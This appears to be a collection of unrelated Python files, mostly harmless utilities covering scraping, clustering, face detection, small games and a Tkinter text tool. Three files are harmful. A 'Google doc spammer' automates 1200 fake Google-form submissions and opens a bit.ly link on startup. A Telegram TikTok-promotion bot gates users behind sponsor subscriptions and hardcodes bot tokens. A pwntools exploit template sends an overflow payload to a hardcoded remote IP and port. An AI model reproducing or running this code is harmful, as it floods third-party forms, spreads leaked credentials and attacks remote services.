    Ordering: by numeric value (length after stripping leading zeros,
    then lexicographic); ties broken by longer original string first,
    then by input position.
    """
    count = int(input())
    raw = [input() for _ in range(count)]
    order = sorted(
        range(count),
        key=lambda idx: (
            len(raw[idx].lstrip("0")),
            raw[idx].lstrip("0"),
            -len(raw[idx]),
            idx,
        ),
    )
    print("\n".join(raw[idx] for idx in order))


if __name__ == '__main__':
    main()
|
import scrapy
from scrapy_splash import SplashRequest
import time
class QuoteSpider(scrapy.Spider):
    """Scrape quotes from the JS-rendered quotes.toscrape.com via Splash."""
    name = 'quote'
    # Lua snippet executed by Splash: disable private mode, load the page,
    # wait for JS, and return the rendered HTML.
    script = '''
        function main(splash, args)
            splash.private_mode_enabled = false
            url = args.url
            assert(splash:go(url))
            assert(splash:wait(1))
            splash:set_viewport_full()
            return splash:html()
        end
    '''

    def start_requests(self):
        yield SplashRequest(
            url="http://quotes.toscrape.com/js",
            callback=self.parse,
            endpoint="execute",
            args={'lua_source': self.script},
        )

    def parse(self, response):
        # One item per quote box on the page.
        for quote_sel in response.xpath('//div[@class="quote"]'):
            yield {
                'quotes': quote_sel.xpath('.//span[@class="text"]/text()').get(),
                'author': quote_sel.xpath('.//span/small/text()').get(),
            }
        # Follow pagination through Splash so the next page is also rendered.
        next_page = response.xpath('//li[@class="next"]/a/@href').get()
        if next_page:
            absolute_url = f"http://quotes.toscrape.com{next_page}"
            print(absolute_url)
            yield SplashRequest(
                url=absolute_url,
                callback=self.parse,
                endpoint="execute",
                args={'lua_source': self.script},
            )
|
class OAIError(Exception):
    """Base class for OAI-PMH protocol errors.

    Attributes:
        code: machine-readable OAI error code (e.g. 'badVerb').
        description: human-readable explanation.

    Now subclasses Exception so these error objects can also be raised;
    existing attribute-based usage is unchanged.
    """
    def __init__(self, code, description):
        # Give Exception the description so str()/repr() are meaningful.
        super().__init__(description)
        self.code = code
        self.description = description
class BadVerb(OAIError):
    """badVerb error: the OAI verb is absent, repeated, or unknown."""
    def __init__(self, verbs=None):
        if not verbs:
            message = 'Missing OAI verb'
        elif len(verbs) == 1:
            message = 'Illegal OAI verb: {}'.format(verbs[0])
        else:
            message = 'Multiple OAI verbs: {}'.format(', '.join(verbs))
        super().__init__('badVerb', message)
class BadArgument(OAIError):
    """badArgument error: *reason* describes the problem, *name* the argument."""
    def __init__(self, reason, name):
        detail = '{} argument: {}'.format(reason, name)
        super().__init__('badArgument', detail)
class BadFormat(OAIError):
    """cannotDisseminateFormat error: the metadataPrefix is not recognised."""
    def __init__(self, prefix):
        detail = 'Invalid metadataPrefix: {}'.format(prefix)
        super().__init__('cannotDisseminateFormat', detail)
class BadFormatForRecord(OAIError):
    """cannotDisseminateFormat error: this record lacks the requested format."""
    def __init__(self, prefix):
        detail = 'Record unavailable in the requested format: {}'.format(prefix)
        super().__init__('cannotDisseminateFormat', detail)
class BadRecordID(OAIError):
    """idDoesNotExist error: no record has the given identifier."""
    def __init__(self, identifier):
        detail = 'Invalid record identifier: {}'.format(identifier)
        super().__init__('idDoesNotExist', detail)
class BadResumptionToken(OAIError):
    """badResumptionToken error: the token is malformed or expired."""
    def __init__(self, token):
        detail = 'Invalid or expired resumption token: {}'.format(token)
        super().__init__('badResumptionToken', detail)
class NoResults(OAIError):
    """noRecordsMatch error: the query selected zero records."""
    def __init__(self):
        message = 'No records match that query'
        super().__init__('noRecordsMatch', message)
|
# Read n (array length) and k (window width), then the n values.
n, k = map (int, input ().split ())
P = list (map (int, input ().split ()))
# K[i] = sum of the length-k window P[i .. i+k-1], built incrementally.
K = [0] * (n - k + 1)
K [0] = sum (P [:k])
for i in range (1, len (K)):
    K [i] = K [i - 1] - P [i - 1] + P [k + i - 1]
# Sentinel zeros on both ends so the maxima below cover empty sides.
K = [0] + K + [0]
# ml[i] = max of K[0..i] (prefix maxima); mr[j] = max of K[j..end]
# (suffix maxima, built by prepending).
ml = [K [0]]
mr = [K [-1]]
for i in range (1, len (K)):
    ml += [max (ml [-1], K [i])]
    mr = [max (mr [0], K [- i - 1])] + mr
# For each position i, take the best window lying entirely at least k
# slots to the left or right; the answer appears to be the minimum over
# positions of that best achievable window sum.
M = []
for i in range (k, n - k + 1):
    M.append (max (ml [i - k], mr [i + k]))
M = set (M)
print (min (M))
# NOTE: Python 2 script (uses raw_input); runs unchanged under Python 2.x.
tries = 1
answer="delhi"
# The player gets up to three attempts at the question.
while tries<=3:
    print("what is the capital of india")
    response=raw_input()
    tries=tries+1
    if (response=="delhi"):
        print("Correct")
        break
    else:
        # FIX: '<>' is the deprecated Python 2 spelling of '!='; '!=' is
        # valid in both Python 2 and Python 3 and behaves identically.
        if ((tries-1) != 3):
            print("Sorry.Try Again ..." + str(tries -1) + " over :( ")
        else:
            print("Sorry.All " + str(tries -1) + " over :( ")
    # print("Sorry try again")
from telegram import MessageEntity, ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton
from telegram.ext import Updater, CommandHandler, ConversationHandler, MessageHandler, Filters, CallbackQueryHandler
# Channels the user must join before promotion is unlocked.
sponsors = ['@dil_zil']
# Parallel lists: users[i] is the first name for chat id usersId[i].
users = []
usersId = []
links = {}
# Main reply keyboard shown under every bot message.
buttons = ReplyKeyboardMarkup([['Продвигать✅', 'Вип программа🔥'], ['Что такое ТикТок❔❓'], [
    'Как работает бот❓❔'], ['Любые вопросы / Предложения по боту📝']], resize_keyboard=False)
def unknown_msg(update, context):
    """Dispatcher for free-text admin commands.

    Recognises /addNewSponsorToThisBot, /removeSponsorFromThisBot,
    /sendAllUsersAd, /whichUsers, /howManyUsersIHave,
    /peopleJoinedToSponsor and /howManyPeopleJoinedToSponsor;
    anything else is silently ignored.
    """
    msg = update.message.text
    if msg.startswith("/addNewSponsorToThisBot") and len(msg) > len("/addNewSponsorToThisBot") + 2:
        small_msg = msg[len('/addNewSponsorToThisBot') + 1:]
        if small_msg[0] != "@":
            context.bot.send_message(chat_id=update.message.from_user.id, text="@ qoyiw oldiga esingdan chiqdimi?:)")
        else:
            sponsors.append(small_msg)
    elif msg.startswith("/removeSponsorFromThisBot"):
        try:
            sponsors.remove(msg[len('/removeSponsorFromThisBot') + 1:])
        except ValueError:
            # Narrowed from a bare except: list.remove raises ValueError
            # when the sponsor is not in the list.
            context.bot.send_message(chat_id=update.message.from_user.id, text="bunaqa admin yo'qku :)")
    elif msg.startswith("/sendAllUsersAd") and len(msg) > len("/sendAllUsersAd") + 2:
        ad = msg[len("/sendAllUsersAd") + 1:]
        for i in range(len(usersId)):
            context.bot.send_message(chat_id=usersId[i], text=ad)
    elif msg.startswith("/whichUsers"):
        all_users = ""
        for i in range(len(users)):
            all_users += users[i] + "-" + str(usersId[i]) + "\n"
        update.message.reply_html(all_users, reply_markup=buttons)
    elif msg.startswith("/howManyUsersIHave"):
        # BUGFIX: the reply text must be a string; passing the raw int
        # fails when the message is sent.
        update.message.reply_html(str(len(usersId)), reply_markup=buttons)
    elif msg.startswith("/peopleJoinedToSponsor") and len(msg) > len("/peopleJoinedToSponsor") + 2:
        name = msg[len("/peopleJoinedToSponsor") + 1:]
        joined_users = []
        for i in range(len(usersId)):
            a = context.bot.get_chat_member(name, usersId[i])
            if a["status"] != "left":
                joined_users.append(users[i])
        str_joined_users = ""
        for user in joined_users:
            str_joined_users += user + "\n"
        update.message.reply_html(str_joined_users, reply_markup=buttons)
    elif msg.startswith("/howManyPeopleJoinedToSponsor") and len(msg) > len("/howManyPeopleJoinedToSponsor") + 2:
        name = msg[len("/howManyPeopleJoinedToSponsor") + 1:]
        joined_users = []
        for i in range(len(usersId)):
            a = context.bot.get_chat_member(name, usersId[i])
            if a["status"] != "left":
                joined_users.append(users[i])
        # BUGFIX: same str() coercion as /howManyUsersIHave.
        update.message.reply_html(str(len(joined_users)), reply_markup=buttons)
    else:
        pass
def start(update, context):
    """Handle /start: register the sender (owner excluded) and greet them.

    Returns conversation state 1, where the keyboard handlers live.
    """
    sender = update.message.from_user
    if sender.id != 440255990:  # skip registering the bot owner
        users.append(sender.first_name)
        usersId.append(sender.id)
    update.message.reply_html(
        '''<b>Привет, {}</b>,\nя помогу раскрутить твой аккаунт в TikTok, а также буду присылать тебе крутые штуки по
продвижению.\n\nДля начала, если не трудно, прочитай как работает бот. 📝'''.format(sender.first_name),
        reply_markup=buttons)
    return 1
def promote(update, context):
    """Ask the user for the TikTok account/video link to promote."""
    prompt_text = '''Отлично! Пришли мне ссылку на свой аккаунт или ссылку на свое видео в TikTok😉'''
    update.message.reply_html(prompt_text, reply_markup=buttons)
def vipProgram(update, context):
    """Describe how to earn VIP access (invite 7 people)."""
    vip_text = '''🥰Чтобы получить вип и попасть к нам в закрытую группу надо пригласить 7 человек.
После того как пригласите 7 человек, отправьте скрин @DeeL_TG он вас добавит в закрытую группу. 💥️'''
    update.message.reply_html(vip_text, reply_markup=buttons)
def whatIsTikTok(update, context):
    """Send a short pitch describing what TikTok is."""
    pitch = ('<b>TikTok</b> - это площадка, где можно легко стать известным👩🏻🦳 и заработать деньги💰. А наша команда '
             'может помочь в этом деле.📌')
    update.message.reply_html(pitch, reply_markup=buttons)
def howBotWorks(update, context):
    """Explain the bot's promotion mechanics and the VIP program."""
    explanation = '''Есть много правил в Тиктоке, которые нельзя нарушать❗️, и о которых нигде не пишут🖊. Мы поможем тебе удачно продвинуть твой тикток и даже начать зарабатывать не нем.
💰Практически каждые 2 дня📌, мы будем присылать тебе крутые идеи/новости/новые правила в тиктоке.➡️\n
Как мы помогаем попасть в рекомендации❓\n
Наша команда👥 с блогерами миллионниками будем смотреть твои посты, делиться, комментировать. Это заметит Тикток и будет продвигать твои видео в реки.\n
Как работает вип программа❓ 🔥\n
Вы приглашаете 7 людей, а мы делаем анализ вашего аккаунта и даем советы по улучшению. И попадете в нашу закрытую группу. Личная беседа с создателем бота.\n
Всех в реки ➡️😊'''
    update.message.reply_html(explanation, reply_markup=buttons)
def anyQuestions(update, context):
    """Point the user at the maintainer's contact handle."""
    contact_text = 'По любым вопросам обращайтесь к ➡️ @DeeL_TG'
    update.message.reply_html(contact_text, reply_markup=buttons)
def linkHandler(update, context):
    """Reply to a submitted link with the numbered sponsor-subscription gate."""
    sponsor_lines = ""
    for num, sponsor in enumerate(sponsors, start=1):
        sponsor_lines += "{}) {}\n".format(num, sponsor)
    keyboard = [[InlineKeyboardButton("Проверить подписку✅", callback_data='1')]]
    reply_markup = InlineKeyboardMarkup(keyboard)
    update.message.reply_html(
        '''Упс.Чтобы мы продвигали твой аккаунт подпишись пожалуйста на наших спонсоров.\n
{}
\nИ мы проверим твой аккаунт в течении 24 часов и начнем продвигать твой аккаунт'''.format(sponsor_lines),
        reply_markup=reply_markup)
    # return 2
def checkJoined(update, context):
    """Inline-button callback: verify the user joined every sponsor channel."""
    query = update.callback_query
    query.answer()
    is_joined = True
    # BUGFIX: iterate over a snapshot — the loop body may remove dead
    # sponsor channels, and mutating a list while iterating it skips
    # the element after each removal.
    for sponsor in list(sponsors):
        try:
            member = context.bot.get_chat_member(sponsor, update.effective_user["id"])
            if member["status"] == "left":
                is_joined = False
                break
        except Exception:
            # get_chat_member failed (channel deleted / bot removed):
            # drop the sponsor so it stops blocking users.
            print("exception occurred")
            sponsors.remove(sponsor)
    if not is_joined:
        query.edit_message_text(text=f'''Ты еще не подписался на спонсорские каналы
Подпишись на них и проверь подписку снова''')
    else:
        query.edit_message_text(text=f'''Отлично 🔥🔥
Мы в течении 24 часов начнем продвигать твой аккаунт в рекомендации. А ты пока не теряй время и публикуй классные ролики в Тик-Ток.''')
    # return 1
# updater = Updater('1604509578:AAFUMndjSSMbHz8TsLtlLnDLXA1imr0KoQU', use_context=True)
# NOTE(review): the bot token is hardcoded in source; it should be moved
# to an environment variable or config file.
updater = Updater('1612017020:AAF-ArUOd_ax12KcXYQbcqpwzSv8XGHEVt8', use_context=True)
# One conversation: /start enters state 1, where the reply-keyboard
# buttons and the inline "check subscription" callback are handled.
conv_handler = ConversationHandler(
    entry_points=[CommandHandler('start', start)],
    states={
        1: [
            MessageHandler(Filters.regex('^(Продвигать✅)$'), promote),
            MessageHandler(Filters.regex('^(Вип программа🔥)$'), vipProgram),
            MessageHandler(Filters.regex('^(Что такое ТикТок❔❓)$'), whatIsTikTok),
            MessageHandler(Filters.regex('^(Как работает бот❓❔)$'), howBotWorks),
            MessageHandler(Filters.regex('^(Любые вопросы / Предложения по боту📝)$'), anyQuestions),
            # MessageHandler(Filters.entity(MessageEntity.URL), linkHandler),
            CallbackQueryHandler(checkJoined)
        ]
    },
    fallbacks=[
        # URLs (submitted TikTok links) go to the sponsor gate; any other
        # text is treated as a potential admin command.
        MessageHandler(Filters.entity(MessageEntity.URL), linkHandler),
        MessageHandler(Filters.text, unknown_msg)
    ]
)
updater.dispatcher.add_handler(conv_handler)
updater.start_polling()
# Block the main thread until the bot is interrupted.
updater.idle()
|
""" Google doc filler/spammer by Jake CEO of annoyance#1904"""
# Third-party wildcard imports first: the script relies on pyautogui's
# press/write/click and tkinter's Tk/Button being in the global namespace,
# and later stdlib imports must not be shadowed by them.
from pyautogui import *
from tkinter import *

# Standard library.
import base64
import io
import os      # used by startthis() (os.getlogin)
import time    # used for time.sleep; do not rely on wildcard re-exports
import webbrowser
from urllib.request import urlopen
# Answers file: one line per form field, in the order main() types them.
PATH = "whattosay.txt" # str(input("Please enter the name of your file"))
# NOTE(review): handle stays open for the program's lifetime by design.
FILE = open(PATH, mode="r+", encoding="UTF-8")
GOOGLE_DOC_INPUTS = 14
# Key used to move between form fields.
KEY = 'tab'
canrun = False
# Completed passes; updated by runmanytimes().
timesran = 0
def Generator(File):
    """Yield the lines of *File* one at a time (reads the whole file once)."""
    yield from File.read().split("\n")
# Module-level answer generator consumed by main().
g = Generator(FILE)
# Give the operator time to focus the browser window before typing starts.
# NOTE(review): assumes 'time' is available via the wildcard imports above
# — confirm, or import it explicitly.
time.sleep(2)
def main(file):
    """Fill one Google-form pass by replaying keystrokes via pyautogui.

    NOTE(review): the *file* parameter is unused — answers come from the
    module-level generator ``g``; this raises StopIteration when the
    answers file is exhausted (handled by runmanytimes()).
    """
    time.sleep(1.5)
    k = KEY
    press(k, presses=2)
    write(next(g))
    time.sleep(.5)
    # tab tab (text)
    press(k)
    write(next(g))
    time.sleep(.5)
    # tab (text)
    press(k, presses=7, interval=0.25)
    time.sleep(.5)
    # tab tab tab tab tab tab tab
    press('space')
    write(next(g))
    time.sleep(.5)
    # spacebar (text)
    press(k)
    write(next(g))
    time.sleep(.5)
    # tab (text)
    press(k)
    press('space')
    time.sleep(.5)
    # tab spacebar
    press('down') #This is for the "How old are ou"
    press('down')
    press('down')
    press('down')
    press('down')
    press('down')
    press('enter')
    time.sleep(.5)
    # downarrorw enter tab
    press(k)
    write(next(g))
    press(k)
    # (text) tab
    press(['space', 'tab'], presses=3)
    # spacebar tab spacebar tab spacebar tab
    write(next(g))
    press(k)
    time.sleep(.5)
    write(next(g))
    press(k)
    write(next(g))
    time.sleep(.5)
    press(k)
    write(next(g))
    time.sleep(.5)
    press(k)
    write(next(g))
    press(k)
    write(next(g))
    time.sleep(.5)
    press(k)
    write(next(g))
    press('enter')
    time.sleep(1)
    # (text) tab (text) tab (text) tab (text) tab (text) tab enter
def runmanytimes(times):
    """Fill and submit the form *times* times, refreshing between passes.

    When the answers file is exhausted (StopIteration from the generator),
    the generator is rebuilt so the answers repeat from the top.
    """
    # BUGFIX: both names were silently treated as locals before — the
    # counter never advanced and the generator rebind had no effect.
    global timesran, g
    for _ in range(times):
        # BUGFIX: was 'timesran + 1', a no-op expression, so the counter
        # display always showed the same number.
        timesran += 1
        text = f"times ran {timesran}"
        print(text, end='')
        print('\b' * len(text), end='', flush=True)
        try:
            main(FILE)
            press('browserrefresh')
            press('enter')
            press('pageup')
            sleep(.5)
            click(clicks=1)
        except StopIteration:
            press('browserrefresh')
            press('enter')
            press('pageup')
            sleep(.5)
            click(clicks=1)
            # Answers exhausted: restart from the top of the file.
            g = Generator(FILE)
            main(FILE)
def startthis():
    """Start button handler: greet the operator, then run 1200 passes."""
    user = os.getlogin()
    print(f'Hello, {user}! How are you?')
    runmanytimes(1200)
def stop():
    """Stop button handler: announce the stop and terminate the program."""
    print("\nstopped")
    exit()
# Minimal Tk control window with Start/Stop buttons.
canv = Tk()
canv.title("RelaxCraft Doc spammer")
canv.geometry('370x170')
# Start button: launches the form-filling loop.
btn1 = Button(canv,
              text='Start',
              command=startthis,
              bg='#7289da',
              fg='#ffffff',
              height = 7,
              width = 15)
# Stop button: exits the program.
btn2 = Button(canv,
              text='Stop',
              command=stop,
              bg='#e96060',
              fg='#ffffff',
              height = 7,
              width = 15)
image_url = "https://cdn.discordapp.com/icons/694604110665613342/19f0085df1176f07400ddf021dbdc01e.jpg"
# NOTE(review): opens an external link in the browser on startup.
webbrowser.open_new_tab("http://bitly.ws/g2My")
canv.configure(bg='#282b30')
btn1.place(x=25, y=22)
btn2.place(x=225, y=22)
# Enter the Tk event loop (blocks until the window closes).
canv.mainloop()
|
import numpy as np
from scipy.spatial.distance import cdist
from sklearn.datasets import load_digits
from sklearn.decomposition import PCA
from sklearn.cluster import KMeans
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import *
import matplotlib.pyplot as plt
import pandas as pd
# Defining our kmeans function from scratch
def KMeans_scratch(x, k, no_of_iterations):
    """Cluster the rows of *x* into *k* groups with plain Lloyd's algorithm.

    Args:
        x: (n_samples, n_features) array of points.
        k: number of clusters (k <= n_samples).
        no_of_iterations: number of centroid-update rounds to run.

    Returns:
        (n_samples,) integer array assigning each row to a cluster in [0, k).

    Note: initial centroids are drawn with np.random.choice, so results
    depend on the global NumPy RNG state.
    """
    # Step 1: pick k distinct input points as the initial centroids.
    init_idx = np.random.choice(len(x), k, replace=False)
    centroids = x[init_idx, :]
    # Step 2/3: assign every point to its nearest centroid.
    # (vectorized argmin replaces the per-row Python loop of the original)
    distances = cdist(x, centroids, 'euclidean')
    points = np.argmin(distances, axis=1)
    # Step 4: alternate centroid update and reassignment.
    for _ in range(no_of_iterations):
        new_centroids = []
        for cluster in range(k):
            members = x[points == cluster]
            if len(members):
                new_centroids.append(members.mean(axis=0))
            else:
                # Keep the previous centroid alive if its cluster emptied,
                # instead of producing NaN from an empty mean.
                new_centroids.append(centroids[cluster])
        centroids = np.vstack(new_centroids)
        distances = cdist(x, centroids, 'euclidean')
        points = np.argmin(distances, axis=1)
    return points
def show_digitsdataset(digits):
    """Render the first 64 digit images on an 8x8 grid of borderless axes,
    tagging each thumbnail with its ground-truth label."""
    fig = plt.figure(figsize=(6, 6))  # figure size in inches
    fig.subplots_adjust(left=0, right=1, bottom=0,
                        top=1, hspace=0.05, wspace=0.05)
    for pos in range(64):
        axis = fig.add_subplot(8, 8, pos + 1, xticks=[], yticks=[])
        axis.imshow(digits.images[pos], cmap=plt.cm.binary,
                    interpolation='nearest')
        # Ground-truth digit in the lower-left corner of each cell.
        axis.text(0, 7, str(digits.target[pos]))
def plot_samples(projected, labels, title):
    """Scatter-plot a 2-D projection with one colour/legend entry per label."""
    plt.figure()
    for lbl in np.unique(labels):
        mask = labels == lbl
        plt.scatter(projected[mask, 0], projected[mask, 1], label=lbl,
                    edgecolor='none', alpha=0.5,
                    cmap=plt.cm.get_cmap('tab10', 10))
    plt.xlabel('component 1')
    plt.ylabel('component 2')
    plt.legend()
    plt.title(title)
def main():
    """Load the cleaned imports-85 dataset, PCA-project it to 2-D, cluster
    with both the scratch k-means above and sklearn's KMeans, and plot both
    labelings for comparison."""
    k = 8
    # Column names of the imports-85 dataset.
    names =['symboling','normalized-losses','make','fuel-type','aspiration','num-of-doors','body-style','drive-wheels','engine-location','wheel-base','length','width','height','curb-weight','engine-type','num-of-cylinders','engine-size','fuel-system','bore','stroke','compression-ratio','horsepower','peak-rpm','city-mpg','highway-mpg','price'] # Column names
    # BUG FIX: was 'drive-wheel', which is absent from `names` and made
    # df.loc[:, features] raise a KeyError.
    # NOTE(review): 'drive-wheels' is categorical in the raw dataset; the
    # 'Clear' file is presumably numeric-encoded — confirm, otherwise
    # MinMaxScaler will fail on strings.
    features = ['drive-wheels','engine-size','price'] # Columns actually used
    input_file = 'dataset/imports-85Clear.data'
    target = 'price'
    df = pd.read_csv(input_file, # Data file
                     names = names) # Column names
    # Separating out the features
    x = df.loc[:, features].values
    # Separating out the target
    y = df.loc[:,[target]].values
    # Scale every feature to [0, 1] so no column dominates the distances.
    x = MinMaxScaler().fit_transform(x)
    normalizedDf = pd.DataFrame(data = x, columns = features)
    normalizedDf = pd.concat([normalizedDf, df[[target]]], axis = 1)
    # PCA projection to two components for clustering and plotting.
    pca = PCA(2)
    projected = pca.fit_transform(x)
    print("Variância expleined por componente:")
    print(pca.explained_variance_ratio_)
    print(df.shape)
    print(projected.shape)
    print("")
    # Cluster with the from-scratch implementation and visualise.
    labels = KMeans_scratch(projected, k, 100)
    plot_samples(projected, labels, 'Clusters Labels KMeans from scratch')
    # Same clustering with sklearn for comparison.
    kmeans = KMeans(n_clusters=k, random_state=0).fit(projected)
    print("inertia_ = ", kmeans.inertia_)
    silhouetteScore = silhouette_score(projected, kmeans.labels_)
    print("Para n_clusters = {}, silhouette_score é {})".format(
        k, silhouetteScore))
    plot_samples(projected, kmeans.labels_,
                 'Clusters Labels KMeans from sklearn')
    plt.show()
if __name__ == "__main__":
    main()
import cv2
import sys
import numpy
import time
# Measure Haar-cascade face-detection FPS on the default webcam until Esc.
num_frames = 120
face_cascade = cv2.CascadeClassifier('haarcascades/cascadG.xml')
# hand_cascade = cv2.CascadeClassifier('Hand.Cascade.1.xml')
cap = cv2.VideoCapture(0)
start = time.time()
count=0
# NOTE(review): num_frames is assigned twice and never read — leftover?
num_frames =100
while(1):
    ret, img = cap.read()
    # Haar cascades operate on grayscale frames.
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    faces = face_cascade.detectMultiScale(gray, 1.3, 5,minSize=(30, 30),
                                          flags=cv2.CASCADE_SCALE_IMAGE)
    # Draw a cyan box around every detected face.
    for (x,y,w,h) in faces:
        cv2.rectangle(img,(x,y),(x+w,y+h),(255,255,0),2)
    # hand = hand_cascade.detectMultiScale(gray,1.3, 5)
    # for (ex,ey,ew,eh) in hand:
    #     cv2.rectangle(img,(ex,ey),(ex+ew,ey+eh),(0,127,255),2)
    cv2.imshow('img',img)
    # fps = 1 / (time.time() - start)
    # print(fps)
    # Esc (key code 27) exits the loop.
    k = cv2.waitKey(1) & 0xff
    if k == 27:
        break
    count=count+1
# Average FPS over the whole run.
end = time.time()
seconds = end - start
print("Time taken : {0} seconds".format(seconds))
fps =count / seconds
print ("Estimated frames per second : {0}".format(fps))
cap.release()
cv2.destroyAllWindows()
|
print("Pick a number")
print("Este programa genera un numero random y pregunta al usuario adivinarlo")
import random
rndm=random.randint(0,100)
print("El numero es: ",rndm)
tries=1
num=int(input("Escoje un numero del 1 al 100: "))
while(num!=rndm):
if(num>rndm):
print("Tu numero es muy grande")
elif(num<rndm):
print("tu numero es muy pequeño")
num=int(input("Escoje un numero del 1 al 100: "))
tries=tries+1
print("Felicidades tu adivinaste el numero {} , en {} oportunidades.".format(num,tries))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template
from pwn import *
# Set up pwntools for the correct architecture
context.update(arch='i386')
exe = './path/to/binary'
ip = "54.161.125.246"
port = 1000
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
def start(argv=[], *a, **kw):
    '''Start the exploit against the target.

    Runs the binary under GDB when the script is invoked with the GDB
    magic arg (pwntools `args`), otherwise as a plain process.'''
    if not args.GDB:
        return process([exe] + argv, *a, **kw)
    return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
#io = start()
# Connect straight to the remote service instead of a local process.
io = remote(ip, port)
# 71 bytes of padding — presumably up to the saved return address; TODO confirm.
payload_size=71
#payload = 'a'*payload_size + p64(0x400b4f)
payload = 'a'*payload_size
log.info('payload size: ' + str(payload_size))
log.info('payload: ' + payload)
io.sendline(payload)
# Hand the connection over to the user for interactive exploration.
io.interactive()
|
import random
import pymunk #1
#define the ball
def add_ball(space):
    """Drop a dynamic circle at a random x position into `space`;
    returns the circle shape."""
    mass, radius = 1, 14
    # Moment of inertia for a solid circle about its centre.
    moment = pymunk.moment_for_circle(mass, 0, radius)
    ball_body = pymunk.Body(mass, moment)
    ball_body.position = random.randint(120, 380), 550
    ball_shape = pymunk.Circle(ball_body, radius)
    space.add(ball_body, ball_shape)
    return ball_shape
#define the L
def add_L(space):
    """Add an inverted-L paddle to `space`: a dynamic body pinned at its
    centre, with a slide joint limiting how far it can swing.
    Returns the two segment shapes."""
    # Static anchor bodies for the two joints.
    pivot_body = pymunk.Body(body_type = pymunk.Body.STATIC)
    pivot_body.position = (300,300)
    limit_body = pymunk.Body(body_type = pymunk.Body.STATIC)
    limit_body.position = (200,300)
    # The paddle: two segments attached to a single dynamic body.
    paddle = pymunk.Body(10, 10000)
    paddle.position = (300,300)
    seg_long = pymunk.Segment(paddle, (-150, 0), (255.0, 0.0), 5.0)
    seg_short = pymunk.Segment(paddle, (-150.0, 0), (-150.0, 50.0), 5.0)
    pivot_joint = pymunk.PinJoint(paddle, pivot_body, (0,0), (0,0))
    joint_limit = 25
    limit_joint = pymunk.SlideJoint(paddle, limit_body, (-100,0), (0,0), 0, joint_limit)
    space.add(seg_long, seg_short, paddle, pivot_joint, limit_joint)
    return seg_long,seg_short
|
from tkinter import *
from tkinter.scrolledtext import ScrolledText
from tkinter.messagebox import *
import re
import os
class StatusBar(Frame):
    """Thin frame holding a single sunken state label, packed on the left."""
    def __init__(self, parent):
        Frame.__init__(self, parent)
        self._lblState = Label(self, text='', bd=2, relief=SUNKEN,
                               width=15, anchor = W)
        self._lblState.pack(side=LEFT)
class SLETool(Frame):
    """Ad-hoc text-manipulation workbench.

    A toolbar of buttons applies regex/text transforms to the contents of a
    central ScrolledText widget; every transform appends its result below a
    '===' rule instead of replacing the input.
    """
    def __init__(self, parent=None):
        Frame.__init__(self, parent)
        self.pack(side=TOP, fill=BOTH, expand=YES)
        self.iniCtrls()
        self.bind("<Destroy>", self.onDestroy)
    def iniCtrls(self):
        """Build the toolbar buttons, the status bar and the text area."""
        frmTop = Frame(self)
        frmTop.pack(side=TOP, fill=X)
        self.status_bar = StatusBar(self)
        self.status_bar.pack(side=BOTTOM, fill=X)
        self.status_bar.config(bd=2, relief=SUNKEN)
        frmMiddle = Frame(self)
        frmMiddle.pack(fill=BOTH, expand=YES)
        # One button per transform; handlers are the on* methods below.
        self.btnCommaCount = Button(frmTop, text='Comma count', command=self.onCommaCount)
        self.btnCommaCount.pack(side=LEFT, padx=5, pady=5)
        self.btnMultiply48to4996 = Button(frmTop, text='Multiply from 48 to 49..96', command=self.onMultiply48to4996)
        self.btnMultiply48to4996.pack(side=LEFT, padx=5, pady=5)
        self.btnMultiply48to0196 = Button(frmTop, text='Multiply from 48 to 1..96', command=self.onMultiply48to0196)
        self.btnMultiply48to0196.pack(side=LEFT, padx=5, pady=5)
        self.btnBlock0148to4996 = Button(frmTop, text='Block from 1..48 to 49..96', command=self.onBlock0148to4996)
        self.btnBlock0148to4996.pack(side=LEFT, padx=5, pady=5)
        self.btnBlock3340to4148 = Button(frmTop, text='Block from 33..40 to 41..48', command=self.onBlock3340to4148)
        self.btnBlock3340to4148.pack(side=LEFT, padx=5, pady=5)
        self.btnSplit = Button(frmTop, text='Split', command=self.onSplit)
        self.btnSplit.pack(side=LEFT, padx=5, pady=5)
        self.btnSubst = Button(frmTop, text='Subst', command=self.onSubst)
        self.btnSubst.pack(side=LEFT, padx=5, pady=5)
        self.btnScript = Button(frmTop, text='Script', command=self.onScript)
        self.btnScript.pack(side=LEFT, padx=5, pady=5)
        Button(frmTop, text='Clear', command=self.onClear).pack(side=RIGHT, padx=5, pady=5)
        self.st = ScrolledText(frmMiddle, font=('courier', 9, 'normal'))
        self.st.pack(side=TOP, fill=BOTH, expand=YES)
    def onCommaCount(self):
        """Count the commas in the text and show the total in a dialog."""
        s = self.st.get('1.0', END)
        cnt = 0
        for c in s:
            if c == ',':
                cnt = cnt + 1
        showinfo("Comma count", 'Comma count is ' + str(cnt))
    def onMultiply48to4996(self):
        """Duplicate the text block numbered 48 into copies numbered 49..96."""
        s = self.st.get('1.0', END+'-1c')
        s1 = ""
        for i in range(49,96+1):
            # Every occurrence of '48' is rewritten to the copy number i.
            sa = re.sub('48', str(i), s)
            s1 = s1 + sa
        self.st.insert(END, '===================================================\n')
        self.st.insert(END, s1)
    def onMultiply48to0196(self):
        """Duplicate the text block numbered 48 into copies numbered 1..96."""
        s = self.st.get('1.0', END+'-1c')
        s1 = ""
        for i in range(1,96+1):
            sa = re.sub('48', str(i), s)
            s1 = s1 + sa
        self.st.insert(END, '===================================================\n')
        self.st.insert(END, s1)
    def onBlock0148to4996(self):
        """Shift the standalone numbers 1..48 in the text up by 48 (to 49..96)."""
        s1 = self.st.get('1.0', END+'-1c')
        for i in range(1,48+1):
            # Match i only when delimited by non-digits: "xx,", "xx ", "xx)", "xx-"
            ma = re.compile(r'(.*)([^0-9])('+str(i)+')([^0-9])(.*)', re.DOTALL)
            # Greedy (.*) makes match() hit the LAST occurrence; loop until none remain.
            while True:
                mo = ma.match(s1)
                if mo is None: break
                g = mo.groups()
